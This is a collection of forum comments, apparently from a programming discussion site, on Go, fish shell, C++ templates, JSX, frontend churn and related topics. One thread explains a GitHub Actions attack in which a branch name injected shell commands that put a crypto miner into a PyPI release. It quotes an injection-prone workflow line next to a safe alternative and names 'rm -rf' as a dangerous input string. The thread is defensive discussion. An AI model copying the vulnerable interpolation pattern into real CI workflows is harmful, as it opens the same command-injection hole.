At the end of the day, you are trying to make something better and more aligned with your values. I hope you succeed. I would just caution against calling tens of thousands of people amateurs. No need to paint with so broad a brush.
NB: I don’t like Go and I don’t work for Google. (Just to preempt allegations. :] )
Arguably it’s mainly societal pressures that create this incentive structure, however, the widespread use of a programming language as undisciplined as Go certainly factors into it.
See it as a stepping stone. I started as a PHP developer and then moved to Go. Rust or Zig will be my next language. If Go would replace inefficient and messy languages like PHP, Python and Ruby, that would be a win, I think. The good thing about Go is that it is simple enough to appeal to that immense group of amateur developers without taste.
Go will never replace PHP, python or Ruby because they don’t occupy the same niche to begin with.
Also, it’s rich calling these “messy and inefficient” (besides the usual caveat that language implementations are that can be slow), especially with reference to Go which is at most in the middle on a theoretical “close to bare metal” scale (the default go compiler does very little optimizations, that’s how it can output binaries fast, plus the runtime has a fairly simple GC which is no performance champion), and I think it itself is a fairly good contender on the messiness scale, given its weak type system and two million dollars mistakes instead of only one!
At least Ruby and Python give you a fast and dynamic environment for explorative programming and scripting with the capability of using very productive libraries due to the expressiveness of these languages, something in which Go is quite lacking (and that can be a fair tradeoff, mind you. But so is not taking this tradeoff).
Anyways, this can get subjective pretty quickly, resulting in language flame wars.
Fair enough. But I do think the niches of all of those languages have a large overlap. I group them all in the category: We want to run something on a server, and we don’t want it to be difficult.
‘Messiness’ is just a negative word for ‘dynamic environment.’ Both can be applicable, sometimes even at the same time. But if we are talking about the first quote, about the proliferation of bugs, then the negative interpretation feels like it has more weight. For me at least.
Arguably it’s mainly societal pressures that create this incentive structure, however, the widespread use of a programming language as undisciplined as Go certainly factors into it.
Thank you for linking to your talk, I really enjoyed it.
You didn’t even mention my least favorite “feature” of Go: panic and recover. Totally not throw/catch!
I say this as someone who has been writing Go for years. I love Go for problems I just want done ASAP but I don’t want to totally screw it up, and I love Zig for problems whose solutions I want to be as good as it possibly can be
I’m gonna learn how to (consistently) finish what I start.
I’ll start with a non-exhaustive list to track all of the things that I’ve started and not finished, so I can explicitly prune the ones I don’t intend to work on, and at least have something to go back to whenever I do have the energy to work on something.
I’ve already made some progress in 2024 on it, so I’ll share a little bit here to help out.
The core insight is that I’m much more likely to finish something if I see consistent progress being made as I work on something, while my “typical” approach has been to ruminate on something for ~3 years and then “draw the rest of the owl” in a single weekend (see: most bunker labs posts as one example).
The reason said typical approach “works” is it essentially makes it so all of the potential barriers to finishing the thing are gone (as I’ve already “finished it in my head”), so I can just go straight to the final product.
This obviously doesn’t work for a large subset of problems (i.e. anything but the kind of research PoC I “usually” tend to put out).
Once I got that insight out of the way, the question became “how do I allow for lower issue resolution AoT such that I can make projects that are longer?”.
What I’ve tried in 2024 so far has been REPL driven development (to a greater degree than I’ve been doing previously, full on Conjure integration, proper setup, etc) and it definitely helped a bit.
In 2025, I’m going to try and “practice finishing”, in the sense of trying to actually either eliminate projects or finish them before moving on to new stuff. I’ve actually been trying to force myself to make a new blog post every month (even if it doesn’t measure up to my usual standards; it’s a different medium), and I also fully completed AoC with a time limit per day (minus the last day to mop up the couple of bits that I had left to do). It’s too early to tell for these yet, but I suspect at the end of next year I’ll see some progress there.
Hope that helps at least a bit (it strongly depends on whether the source for your struggles resembles mine). Happy new year!
If either of you are interested in going nuclear, I can recommend Beeminder which I’ve been using for over a year now: https://www.beeminder.com
In short, you set a goal like say; writing 1 blog post a month and if you don’t reach the goal, you get charged $x. The aim here isn’t to never lose money but to reach a point where you’re sufficiently incentivised (financially) to do whatever your goal is.
It’s pretty nutty at first but once you get into it, it becomes a pretty fool proof setup where I know if I stick something in Beeminder, it’ll get done whether I like it or not.
The founders have been around for over a decade as well and if you derail (don’t hit your goal) for a legitimate reason like you were sick, there are no questions asked around refunds.
It’s less of a traditional business and more of an economics experiment let loose but it works for a lot of people. There’s plenty of theorising on their blog as well: https://blog.beeminder.com/defail/
I had the same problem (that I would be working on too many things and would start new things before finishing existing things) so I instituted a system like OP in Things.app.
I only use projects for things that will require long and sustained effort and I put them into areas called Now/Next/Later. The idea is to work only on things in Now and to finish stuff before pulling in new things.
Each Things project has metadata and a slug that is also the tag for all mails relating to it and the subfolder in my projects directory etc.
One thing I’ve found helpful is I explicitly list out next steps of my project in Obsidian as a checklist.
What I realized is that planning the project requires executive function, which can be worn down by the time I get time to push a project forward at the end of the day. These steps can be very simple or more complex. The goal is to get them down somewhere so that your brain doesn’t have to carry them around anymore. I usually write these early in the day if needed, when I have the most clarity.
Oof - this is a (helpful!) tough observation to hear, because I know this (intellectually) from reading Getting Things Done, and now recognize that I’ve been dropping the ball in a way that I should have already known. Thank you for the prompt to pay more attention to my organizational systems and repair them to a more useful state!
I think it all boils down to determination. If you believe in yourself and commit to finishing everything you start, you will quickly arrive at the conclusion that you shouldn’t start anything.
I saw mention of async prompts becoming a core feature. Would love to help out on this. Have previous experience with Rust (original watchexec author) and fish async prompts (created lucid, the first really solid async prompt IMHO).
Even though I was sick, I got out of bed and rushed to the computer
This is insane. Is the rest of the team that bad that they couldn’t handle it? Making Sentry calls blocking was a clear mistake, not sure how easy it was to avoid, but:
it should have been fixed the first time! Why does the same blocking issue occurs after 2 days??
knowing the issue, why couldn’t the dev just disable Sentry calls made by the app (assuming making them non blocking was hard, which I don’t believe) instead of yapping about moving to the cloud?
Some people really need to learn how to disconnect.
Some people really need to learn how to disconnect.
The response from the wife was kind of sad, too. Kind of accepts that this is how life is, that all he cares about is work. I was surprised the fainting in the bathroom didn’t lead to an ER visit.
Hindsight is 20/20, but when this happened again I’d lean toward waking the dev up in the middle of the night, show him the carnage, and then say, “make it work ASAP.” You can also say you’re open to discussing cloud migration in the future but for now prod needs to stay up.
Seems like the organizational structure protects him from the consequences of his actions too much.
Yes. The real lesson may be to develop the soft skills to define when a problem must be fixed elsewhere and make other people agree and action it that way.
I wish this article had elaborated a bit on specific things creating a “Template Metapocalypse” and how they were later solved. To me, C++ still is a language where the standard library - STL - is a template library. I’m not denying that C++11 did address many problems, but developers still need to think a lot about what is a compile time expression and what is a runtime expression, and that the language imposes different constraints on each.
I’m not certain they were solved. But I think there was a collective opinion at some point that perhaps we might’ve gone too far with templates and we should back off a bit, despite everyone believing that snuffing enough Alexandrescu-inspired templating would bring us to valhalla.
I think there is a difference between say boost::regex (which IIRC is compile-time regexes) and STL … STL is definitely elaborate, but it works fine for me. I’ve never used anything in Boost, which seems to have been heavily influenced by template metaprogramming “fashion”
The error messages could be better, I think that is fundamental though
I disagree that the bad error messages problem is fundamental: cpp compilers could encode some common template patterns as internal state and detect common mistakes. This is possible, it “just” increases the compiler’s complexity because it now has to deal with a meta-cpp language. Rust is generally regarded as having mostly good errors (I’m proud of that), and some of that is smart language design that pushes restrictions closer and closer to the definition so that the compiler can have more information available about the problem, but I’d wager that the majority of it is attributable to rustc collecting metadata and doing analysis beyond what is needed to build a functional Rust compiler.
std::regex is originally based on boost::regex design and API, both are runtime regexes. That said, boost::regex kept evolving and improving unlike the std:: one.
Compile-time regex is https://github.com/hanickadot/compile-time-regular-expressions a very fine library which should be the first tool to reach for when one needs regex in C++ as it’s somewhat uncommon to have to create regexes at runtime.
If you actually do, for instance because you’re building filters based on user input (or simply because your users asked “i want to be able to put regexes in fields”, I’d recommend using google’s re2 library.
Ah OK thanks for the correction, probably should have looked that up … I haven’t used Boost, but I know Boost favors compile time, and it did so back when C++ was weaker at compile time (e.g. before C++ 11, 14, 17 , …)
This was a long time ago, but FWIW
at my first job we used C, and then switched to C++, without STL
second job used C++ with STL, but no Boost at all
There are probably still a lot of C++ jobs like this, as C++ codebases can be pretty old. The original question was about “Template metapocalypse” – I guess my answer is that C++ is very heterogeneous and you may not have that problem.
There are probably still a lot of C++ jobs like this, as C++ codebases can be pretty old.
I don’t know to be honest, I’ve been doing C++ professionnally for quite some time now and have really never seen this kind of job. Even something like arduino ships modern C++ with pretty much full C++ standard library by default.
Boost is definitely intended to be template based. Bear in mind it’s over almost 30 years old and back in the day the performance gains at runtime were significant AND we didn’t expect compilation to be fast.
Lovely to see the changes and improvements. I keep eyeing Fish to replace my Zsh setup, but worry about losing out on years of muscle memory for POSIX-ish shell syntax.
In other news, I wish the blog has an RSS feed, I’d like to keep up to date with new releases to read about features etc…
As a prime example of this, a while back they added the ability to do FOO="blah" some-command instead of the previous version where you need to prefix with env. This alone resolved something like 90% of the ways my daily use of fish diverged from what I would have written in bash or zsh.
I colleague of mine recently switched. That surprised me because he had quite some zsh setup and as far as I know fish does not really offer more feature-wise. He told me that he likes fish because it is more „snappy“.
Out of the box, Fish has far more features than Zsh. It doesn’t offer anything else feature-wise if you install all the Zsh modules that were created to implement Fish features, but they’re fiddly and often just don’t work as well. If you want Zsh like Fish, just use Fish.
I agree. The point is if you already invested the time to set up zsh with all kinds of modules, then switching to fish is not much of an improvement. So I don’t recommend fish to zsh power users.
That said, I have now the anecdotal evidence from one person that fish was still worth switching.
It’s far less janky than zsh, mostly because you have less user-authored code (users in general, not you specifically). I don’t touch my config for months on end and things just keep humming along well.
I don’t touch my config for months on end and things just keep humming along well.
I don’t touch my Zsh config for years on end and likewise. On the other hand, I imagine my Zsh config took longer to write than your Fish config, though.
I have also encountered people (online) who didn’t know that you could render web pages on the server.
React was their default; I saw some static websites that were just static JSX in React. Like if you wanted to put up some photos of your apartment or vacation on your own domain, you would create a React app for that.
People learn by imitation, and that’s 100% necessary in software, so it’s not too surprising. But yeah this is not a good way to do it.
The web is objectively worse that way, i.e. if you have ever seen an non-technical older person trying to navigate the little pop-out hamburger menus and so forth. Or a person without a fast mobile connection.
If I look back a couple decades, when I used Windows, I definitely remember that shell and FTP were barriers to web publishing. It was hard to figure out where to put stuff, and how to look at it.
And just synchronizing it was a problem
PHP was also something I never understood until I learned shell :-) I can see how JavaScript is more natural than PHP for some, even though PHP lets you render on the server.
That’s not completely true, one beautiful JSX thing is that any JSX HTML node is a value, you can use all your language at your disposal to create that HTML. Most backend server frameworks use templating instead. For most cases both are equivalent, but sometimes being able to put HTML values in lists and dictionaries and have the full power of the language do come in handy.
Well, that’s exactly what your OP said. Here is an example in Scala. It’s the same style. It’s not like this was invented by react or even by frontend libraries.
In fact, Scalatags for example is even better than JSX because it is really just values and doesn’t even need any special syntax preprocessor. It is pure, plain Scala code.
Most backend server frameworks use templating instead.
Maybe, but then just pick a better one? OP said “many” and not “most”.
Fine, I misread many as most as I had just woken up. But I’m a bit baffled that a post saying “pick a better one” for any engineering topic has been upvoted like this. Let me go to my team and let them know that we should migrate all our Ruby app to Scala so we can get ScalaTags. JSX was the first such exposure of a values-based HTML builder for mainstream use, you and your brother comment talk about Scala and Lisp as examples, two very niche languages.
When did I say that this was invented by React? I’m just saying that you can use JSX both on front and back which makes it useful for generating HTML. Your post, your sibling and the OP just sound slightly butthurt at Javascript for some reason, and it’s not my favourite language by any stretch of the imagination, but when someone says “JSX is a good way to generate HTML” and the response is “well, other languages have similar things as well”, I just find that as arguing in bad faith and not trying to bring anything constructive to the conversation, same as the rest of the thread.
Let me go to my team and let them know that we should migrate all our Ruby app to Scala so we can get ScalaTags.
But the point is that you wouldn’t have to - you could use a Ruby workalike, or implement one yourself. Something like Markaby is exactly that. Just take these good ideas from other languages and use it in yours.
Anyway, it sounds like we are in agreement that this would be better than just adopting JavaScript just because it is one of the few non-niche languages which happens to have such a language-oriented support for tags-as-objects like JSX.
I found that after all I prefer to write what is going to end up as HTML in something that looks as much as HTML as possible. I have tried the it’s-just-pure-data-and-functions approach (mostly with elm-ui, which replaces both HTML and CSS), but in the end I don’t like context switching it forces on my brain. HTML templates with as much strong checks as possible is my current preference. (Of course, it’s excellent if you can also hook into the HTML as a data structure to do manipulations at some stage.)
For doing JSX (along with other frameworks) on the backend, Astro is excellent.
That’s fair. There’s advantages and disadvantages when it comes to emulating the syntax of a target language in the host language. I also find JSX not too bad - however, one has to learn it first which definitely is a lot of overhead, we just tend to forget that once we have learned and used it for a long time.
In the Lisp world, it is super common to represent HTML/XML elements as lists. There’s nothing more natural than performing list operations in Lisp (after all, Lisp stands for LISt Processing). I don’t know how old this is, but it certainly predates React and JSX (Scheme’s SXML has been around since at least the early naughts).
Yeah, JSX is just a weird specialized language for quasiquotation of one specific kind of data that requires an additional compilation step. At least it’s not string templating, I guess…
Every mainstream as well as many niche languages have libraries that build HTML as pure values in your language itself, allowing the full power of the language to be used–defining functions, using control flow syntax, and so on. I predict this approach will become even more popular over time as server-driven apps have a resurgence.
I am not a web developer at all, and do not keep up with web trends, so the first time I heard the term “server-side rendering” I was fascinated and mildly horrified. How were servers rendering a web page? Were they rendering to a PNG and sending that to the browser to display?
I must say I was rather disappointed to learn that server-side rendering just means that the server sends HTML, which is rather anticlimactic, though much more sane than sending a PNG. (I still don’t understand why HTML is considered “rendering” given that the browser very much still needs to render it to a visual form, but that’s neither here nor there.)
(I still don’t understand why HTML is considered “rendering” given that the browser very much still needs to render it to a visual form, but that’s neither here nor there.)
The Bible says “Render unto Caesar the things that are Caesar’s, and unto God the things that are God’s”. Adapting that to today’s question: “Render unto the Screen the things that are the Screen’s, and unto the Browser the things that are the Browser’s”. The screen works in images, the browser works in html. Therefore, you render unto the Browser the HTML. Thus saith the Blasphemy.
(so personally I also think it is an overused word and it sounds silly to me, but the dictionary definition of the word “render” is to extract, convert, deliver, submit, etc. So this use is perfectly inline with the definition and with centuries of usage irl so i can’t complain too much really.)
I don’t think it would be a particularly useful distinction to make; as others said you generally “render” HTML when you turn a templated file into valid HTML, or when you generate HTML from another arbitrary format. You could also use “materialize” if you’re writing it to a file, or you could make the argument that it’s compilers all the way down, but IMO that would be splitting hairs.
I’m reminded of the “transpiler vs compiler” ‘debate’, which is also all a bit academic (or rather, the total opposite; vibe-y and whatever/who cares!).
Technically true, but in the context of websites, “render” is almost always used in a certain way. Using it in a different way renders the optimizations my brain is doing useless.
React was their default; I saw some static websites that were just static JSX in React. Like if you wanted to put up some photos of your apartment or vacation on your own domain, you would create a React app for that.
Unless it was being rendered on the client, I don’t see what’s wrong with that. JSX and React were basically the templating language they were using. There’s no reason that setup cannot be fully server-generated and served as static HTML, and they could use any of the thousands of react components out there.
Yeah if you’re using it as a static site generator, it could be perfectly fine
I don’t have a link handy, but the site I was thinking about had a big janky template with pop-out hamburger menus, so it was definitely being rendered client side. It was slow and big.
React was their default; I saw some static websites that were just static JSX in React. Like if you wanted to put up some photos of your apartment or vacation on your own domain, you would create a React app for that.
I’m hoping tools like Astro (and other JS frameworks w/ SSR) can shed this baggage. Astro will render your React components to static HTML by default, with normal clientside loading being done on a per-component basis (at least within the initial Astro component you’re calling the React component from).
I’m not sure I would call a custom file type .astro that renders TS, JSX, and MD/X split by a frontmatter “shedding baggage”. In fact, I think we could argue that astro is a symptom of the exact same problem you are illustrating from that quote.
That framework is going to die the same way that Next.JS will: death by a thousand features.
huh couldn’t disagree more. Astro is specifically fixing the issue quoted: now you can just make a React app and your baseline perf for your static bits is now the same as any other framework. The baggage I’m referring to would be the awful SSG frameworks I’ve used that are more difficult to hold correctly than Astro, and of course require plenty of other file types to do what .astro does (.rb, .py, .yml, etc.). The State of JS survey seems to indicate that people are sharing my sentiments (Astro has a retention rate of 94%, the highest of the “metaframeworks”).
I don’t know if I could nail what dictates the whims of devs, but I know it isn’t feature count. If Next dies, it will be because some framework with SSG, SSR, ISR, PPR, RSC, and a dozen more acronym’d features replaced it. (And because OpenNext still isn’t finished.)
Astro’s design is quite nice. It’s flexing into SSR web apps pretty nicely I’d say. The way they organize things isn’t always my favorite, but if it means I can avoid ever touching NextJS I’m happy.
Biggest pet peeve is how VSCode doesn’t seem to surface errors across the whole project: I have to open up files that were affected by a rename of an exported symbol to see red squigglies show up. Feels regressive from a usability perspective, as the computer knows this information, and all the older languages of yore could do this easily in an IDE.
I’m able to do that in IntelliJ. I was surprised it didn’t come up as a setting in vscode. It looks like they’ve been trying to solve the issue since 2016.
For those who are curious but don’t want to pick through the github issue threads:
A malicious PR making a very innocent looking change to the README used a branch name with shell commands in it, formatted in a way that would cause CI jobs to execute those commands when performing a build for upload to PyPi. Those commands downloaded a crypto miner and embedded it into the release package.
So the automated builds that were getting uploaded to PyPi had the miner, but the source in github did not and any build you produced manually by cloning the repository and running a build on your local machine would not have it either.
It’s an interesting attack. Hopefully we’ll see a more detailed description of why a branch name from a PR was getting consumed by GitHub CI in a way that could inject commands.
I don’t think “never trusting user input” is the right lesson to learn here. Why? Because I don’t think the whoever wrote that code was aware they were trusting the branch name, or what properties of the branch name exactly they were trusting. So the lesson is not really actionable.
I think the lesson is that these kinds of string-replacement based systems (YAML templates, shell variable expansion etc.) just naturally invite these issues. They are inherently unsafe and we should be teaching people to use safer alternatives instead of teaching them to be vigilant 100% of the time.
For e.g. SQL queries it seems the industry has learned the lesson and you’ll rightfully get ridiculed for building your queries via naive string interpolation instead of using a query builder, stored procedures or something of the sort. Now we need to realize that CI workflows, helm charts and everything else using string-level YAML templating is the same deal.
The FP people have a mantra “parse, don’t validate” for consuming text. I think we need another one for producing text that’s just as snappy. Maybe “serialize, don’t sanitize”?
I’m wishing for a CI/automation tool that would provide functionality like “check out a git branch” as functions in a high-level language, not as shell commands embedded in a data file, so that user input is never sent to a shell directly at all. Maybe I should make one…
Before all the hip yaml based CI systems, like github actions, pretty much everyone was using Jenkins.
The sorta modern way to use Jenkins these days is to write Groovy script, which has stuff like checkout scm, and various other commands. Most of these are from Java plugins, and so the command never ends up going anywhere near a shell, though you do see a lot of use of the shell command function in practice (i.e. sh "make").
Kinda a shame that Jenkins is so wildly unpopular, and these weird yaml-based systems are what’s in vogue. Jenkins isn’t as bad as people make it out to be in my opinion.
Please do build something though because Jenkins isn’t exactly good either, and I doubt anyone would pick Groovy as a language for anything today.
I’ve used Jenkins quite a bit, that’s one of the inspiration source for that idea indeed. But Groovy is a rather cursed language, especially by modern standards… it’s certainly one of my least favorite parts of Jenkins.
My idea for a shell-less automation tool is closer to Ansible than to Jenkins but it’s just a vague idea so far. I need to summarize it and share it for a discussion sometime.
I doubt anyone would pick Groovy as a language for anything today.
I use Groovy at $DAILYJOB, and am currently learning Ruby (which has a lot more job listings as Elixir). The appeal of both languages are the same: it is incredibly easy to design DSLs with it (basically what Jenkins and Gradle use). Which is precisely what I work with at $DAILYJOB. The fact it’s JVM-based is the icing on the cake, because it’s easy to deploy in the clients’ environments.
This looks really interesting, thanks for the pointer! Maybe it’s already good for things I want to do and I don’t need to make anything at all, or may contribute something to it.
The generation of devs that grew up on Jenkins (including myself) got used to seeing CI as “just” a bunch of shell scripts. But it’s tedious as hell, and you end up programming shell via yaml, which makes me sympathetic to vulns like these.
Yeah in dealing with github’s yaml hell I’ve been wishing for something closer to a typed programming language with a proper library e.g. some sort of simplified-haskell DSL à la Elm, Nix, or Dhall.
They all do?
They all provide ways to build specific branches defined in yaml files or even via UIs rather than letting that work for your shell scripts.
Personally I find all those yaml meta-languages all inferior than just writing a shell script. And for one and a half decades I’ve been looking for an answer to the question:
What’s the value of a CI server other than running a command on commit?
But back to your point. Why? What you need to do is sanitize user input. That is completely independent of being shell script versus another language. Shellscripts are actually higher level than general purpose programming languages.
I’m certainly not saying that one doesn’t need to sanitize user input.
But I want the underlying system to provide a baseline level of safety. Like in Python, unless I’m calling eval() it doesn’t matter that some input may contain the character sequence os.system(...; and if I’m not calling os.system() and friends, it doesn’t matter if a string may have rm -rf in it. When absolutely any data may end up being executed as code at any time, the system has a problem, as of me.
Buildbot also belongs on the list of “systems old enough to predate YAML-everywhere”. It certainly has its weaknesses today, but its config is Python-based.
In GitHub Actions specifically, there’s also a very straightforward fix: instead of interpolating a string in the shell script itself, set any values you want to use as env vars and use those instead. e.g.:
I don’t think string replacement systems are bad per se. Sure, suboptimal in virtually all senses. But I think the biggest issue is a lack of good defaults and a requirement to explicitly indicate that you want the engine to do something unsafe. Consider the following in GH Actions:
echo "Bad: ${{ github.head_ref }}"
echo "Good: $GITHUB_HEAD_REF" # or so @kylewlacy says
I do not see any major difference immediately. Compare to Pug (nee Jade):
Using an unescaped string directly is clear to the reader and is not possible without an opt-in. At the same time, the opt-in is a matter of a single-char change, so one cannot decry the measure as too onerous. The mantra should be to make unescaped string usage explicit (and discouraged by default).
But to escape a string correctly, you need to know what kind of context you’re interpolating it into. E.g. if you’re generating a YAML file with string values that are lines of shell script, you might need both shell and YAML escaping in that context, layered correctly. Which is already starting to look less like string interpolation and more like serialization.
A few years Over a decade ago (jesus, time flies!) I came up with an ordered list of approaches in descending order of safety. My main mantra was “structural safety” - instead of ad-hoc escaping, try to fix the problem in a way that completely erases injection-type security issues in a structural way.
Yeah. The problem is that the echo command interpretes things like ${{...}} and executes it. Or is it the shell that does it in any string? I’m not even sure and that is problem. No high level language does that. Javascript uses eval, which is already bad enough, but at least you can’t use it inside a string. You can probanly do hello ${eval(...)} but then it is clear that you are evaluating the code inside.
It’s the shell that evaluates $... syntax. $(cmd) executes cmd, ${VAR} reads shell variables VAR and in both cases the shell replaces the $... with the output before calling the echo program with the result. Echo is just a dumb program that spits out the arguments its given.
Edit: but the ${{ syntax is GitHub Actions’ own syntax, the shell doesn’t see that as GH Actions evaluates it before running the shell command.
The pull_request_target event that was used here is privilege escalation similar to sudo – it gives you access to secrets etc.
Like all privilege escalation code, this should be very carefully written, fuzzed, and audited. Certainly a shell script is exactly wrong – sh was never designed to handle untrusted input in sensitive scenarios. Really it’s on GitHub Actions for making shell script-based privilege escalation code the easy path.
At the very least you want to use a language like Rust, leveraging the type system to carefully encapsulate untrusted code, along with property-based testing/fuzzing for untrusted inputs. This is an inherently serious, complex problem, and folks writing code to solve it should have to grapple with the complexity.
I don’t know if it was a bot or not (but that is probably irrelevant). The problem in the PR lies in the branch name which executed arbitrary code during GitHub Actions. Sorry if I misunderstood your question.
Hm, the dots don’t connect for me yet. I can just make a PR with changes to build process, and CI would test it, but that should be fine, because PRs run without access to secrets, right?
It’s only when the PR is merged and CI is run on the main branch that secrets are available, right?
So would it be correct to say that the PR was merged into main, and, when running CI on the main branch, something echoed the branch name of recently-merged PR?
Why would you ever want to expose your secrets to a pull request on an open source project? Once you do that, they’re not actually secrets, they’re just … weakly-obscured configuration settings. This is far from the first time this github “feature” has been used to attack a project. Why do people keep turning it on? Why hasn’t github removed it?
If I understand it correctly, I can maybe see it used in a non-public context, like for a companies internal CI.
But for open source and public repos it makes no sense. Even if it’s not an attack like in this case, a simple “echo …” makes the secrets no longer secret.
Note that the version of the workflow that’s used is the one in the target branch, not the one in the proposed branch.
There are legitimate use cases for this kind of privilege escalation, but GHA’s semiotics for it are all wrong. It should feel like a Serious, Weighty piece of code that should be carefully validated and audited. Shell scripts should be banned, not the default.
Thanks for the explanation, I was literally about to post a question to see if I understood it correctly. I am absolutely paranoid about the Actions running on my Github repos, it would seem to be that a closed PR should not be involved in any workflow. While the branch name was malicious, is there also a best practice to pull out here for maintainers?
While the branch name was malicious, is there also a best practice to pull out here for maintainers?
Don’t ever use pull_request_target trigger, and, if you do, definitely don’t give that CI job creds to publish your stuff.
The root cause here is not shell injection. The root cause is that untrusted input gets into CI run with creds at all. Of course, GitHub actions doesn’t do that by default, and you have to explicitly opt-into this with pull_request_target. See the linked SO answer in a sibling commnet, it explains the issue quite nicely.
Ah, comment by Foxboron clarifies that what happened here is not the job directly publishing malicious code, but rather poisoning the build cache to make the main branch CI pull bad data in! Clever! So, just don’t give any permissions for pull_request_trigger jobs!
My public repos don’t run CI jobs for PRs automatically, it has to be manually approved. I think this is the default. Not sure what happened in this case though.
It is totally fine to run CI on PR. CI for PRs does not get to use repository secrets, unless you go out of your way to also include secrets.
If you think your security depends on PRs not triggering CI then it’s is likely that either:
you don’t understand why you project is actually secure
your project is actually insecure
GitHub “don’t run CI for first time contributors” has nothing to do with security and has everything to do with using maintainer’s human judgement to protect free GitHub runners free compute from being used for mining crypto.
That is, this is a feature to protect GitHub/Microsoft, not your project.
Should be easily solvable by billing those minutes to the PR creator.
I guess there is also the situation where you provide your own runner rather than buying it from Github. In that case it seems like a reasonable precaution to restrict unknown people from using it.
Should be easily solvable by billing those minutes to the PR creator.
Yes! I sympathize GitHub for having to implement something here on a short notice when this happened the first time, but I am dismayed that they didn’t get to implementing a proper solution here: https://matklad.github.io/2022/10/24/actions-permissions.html
I guess there is also the situation where you provide your own runners
Yes, the security with self-hosted runners is different. If you use non-sandboxed self-hosted runners, they should never be used for PRs.
Thank you, that’s a great summary, and a very interesting attack vector.
It’s strange (to me) that a release would be created off of an arbitrary user created branch, but I’m sure there’s a reason for it. In years and years of working with build automation I’ve never thought about that kind of code injection attack, so it’s something I’ll start keeping in mind when doing that kind of work.
Frontend technologies are relatively new compared to backend counterparts and they are still developing, thus in constant flux. What you’re experiencing is, which may sound ridiculous, a revolution. That’s why the APIs change so much, we’re still figuring this out. I have to admit it’s a lot of churn, but it’s necessary for a better future.
My suggestion would be to either choose a boring and stable alternative, e.g. Ember, or stay in the current major and push against the FOMO. Switching to htmx works well too, albeit a large refactor IMO and has tradeoffs that may be too much depending on project requirements.
Frontend technologies are relatively new compared to backend counterparts and they are still developing, thus in constant flux. What you’re experiencing is, which may sound ridiculous, a revolution. That’s why the APIs change so much, we’re still figuring this out. I have to admit it’s a lot of churn, but it’s necessary for a better future.
Is it, though? Frontend is basically doing, these days, the work that a GUI toolkit used to do on desktop, since frontend developers have decided to reject the platform-native toolkit and implement their own, using it only as a low-level rendering target. You do see some churn in desktop GUI toolkits, but nothing like in web frontend.
Fair point, and since I have zero experience in native UI development I can’t say much. But lately I’ve seen React influence mobile development such as SwiftUI and Jetpack Compose, which must’ve meant some churn for mobile devs and that there was room for innovation.
I will agree Android development churns about as much as Web frontend development. I was thinking more about desktop UIs, which have been a lot more stable. You can run Win32 apps from the late 90s on modern Windows, and I believe you could mostly rebuild them without changes. You can rebuild NextStep apps for modern MacOS with very few changes.
I’ve heard that Windows is legendary in terms of backwards compatibility, probably due to enterprise customers they have.
“with very few changes” depends on how many changes do you consider to be very few. The author complains about Tanstack Query but v5 comes with a codemod that does the job for you.
While I haven’t done any desktop app development, I’ve heard that retained mode graphics (which I gather is the default for desktop toolkits) is harder to develop and I enjoy that the industry started to adopt immediate mode graphics.
The maintenance burden is what matters, the last thing I want to be doing after I finally get back to a personal project is fight with the hips system, update dependencies with braking changes, find out there is no replacement for one lib I’m using and it’s abandoned / not longer compiles if I update common dependencies wit other libs, etc.
I want to come back months later and be able to work on a personal project, not spend my fleeting time maintaining it. Tech stack here matters
It’s insane to me that people accept the BS work of keeping up with the version treadmill. Don’t you want to be doing things other than fiddling with code that was working fine yesterday?
In my opinion, I think many developers feel that any code containing bugs (or that hasn’t seen an update in some period of time) is a potential exploit and the only thing to do is constantly update the code. Yes, I want to do other things than fiddling with code that was working fine yesterday, but I think that’s a (sadly) minority position these days.
Yes, I am considering this, since multiple people gave me the same feedback.
I didn’t go into too much detail about the Go+HTMX+Templ stack because I wanted to keep the blog post short and focus exclusively on the topic of dependency management.
I’m maintaining a React app at work in production and am looking fondly at htmx, lol. The whole React stack has a bonkers level of complexity. The constant flow of upgrades and security vulns. The evolving ‘best practices’ every couple of years. The Node and npm breakages. Having to move away from the deprecated CRA to Vite and Vitest. The list goes on.
Is it just me when I see genAI content in a talk, I get wary that how much effort has been put in it?
Is the whole talk generated?
How much of it is generated by a robot? Can it be trusted?
I am biased against using genAI due to having many artist friends.
I don’t think the talker here has done anything wrong really, just using the tools they have I suppose.
But it’s this nagging feeling that something is off. Kinda like the generated content always looks off. And it’s hard to trust it due to that.
It’s not just you. I think the way we’ve typically assessed the quality of human to human communication at a first approximation leans heavily on the relative expense of signaling: is the talk grammatically correct, laid out well visually, flows well, etc. All of these things point to “the speaker spent some time outlining their thoughts in a cohesive manner, so the content could be worthwhile.”
Then there’s genAI images, where you type what you want, and it spits out something in 1 minute, ready to use. Totally messes with our heuristic outlined above. Except it has nothing to do with the content itself! As a counter-point: we probably wouldn’t have an issue with a meme, despite it being easy to locate and put in.
We’ve all read posts where the images and content were clearly AI-written. I think we’re just adapting to the idea that parts of something could use AI in the process without compromising the content.
It’s funny how these signalling issues mirror some of the older issues from my childhood. I have cerebral palsy and there was a resistence in the 80’s and 90’s to allowing me to submit my homework assignments typed instead of handwritten.
Quality penmanship was signal the deliberate effort had been put into an asignment.
The use of white-out on the page told the reader that this work was a first draft, instead of a hand written copy of an earlier pencil draft. This signal wasn’t present in typewritten documents.
There was no way to prove that I hadn’t used a spellchecker.
Removing these external signals would give me an unfair advantage over other students. Thankfully, I only had one teacher who refused to budge on the issue due to his philosophical idealism.
I’m not saying any of this as a supporter of AI (e.g. I don’t use any LLM in my own coding work). I’m mostly just finding it funny the was that history rhymes.
At least in your example, the input is from your brain, the output just looks different.
In genAI case, the input is not really what you say, but some soup of copy pasted stuff from scraped material, and then that pretends to be human output.
in particular, if we ignore the spellchecker point:
printed text is lower entropy than handwritten text, but the information that is there is all intentional; whereas
an ai generated image comprises not much more information than the prompt that generated it, but the presentation is burdened with noise; a human-made image contains high entropy but little noise
*nod* I’m reminded of a great article named Targeted Advertising Considerd Harmful that goes into the biological signalling theory (i.e. peacock tails) angle.
The introduction of targeted adverising made online ads in general worthless as a signal to the potential customer that the vendor wasn’t a fly-by-night scam.
My current axe to grind: on M-series Macs, when I plug a monitor in via HDMI, it uses YCbCr instead of RGB, giving the monitor this pervasive hazy tint that is perceptible even with Night Shift on.
I have to use BetterDisplay to force it to RGB every time I connect to the monitor. This should be something I can set on a per-monitor basis.
Unfortunately I can’t use DisplayPort because my Caldigit TS3 Plus seems to have difficulty passing DP1.2 signals over when variable refresh rates are selected. And guess what macOS likes to default to there, as well?
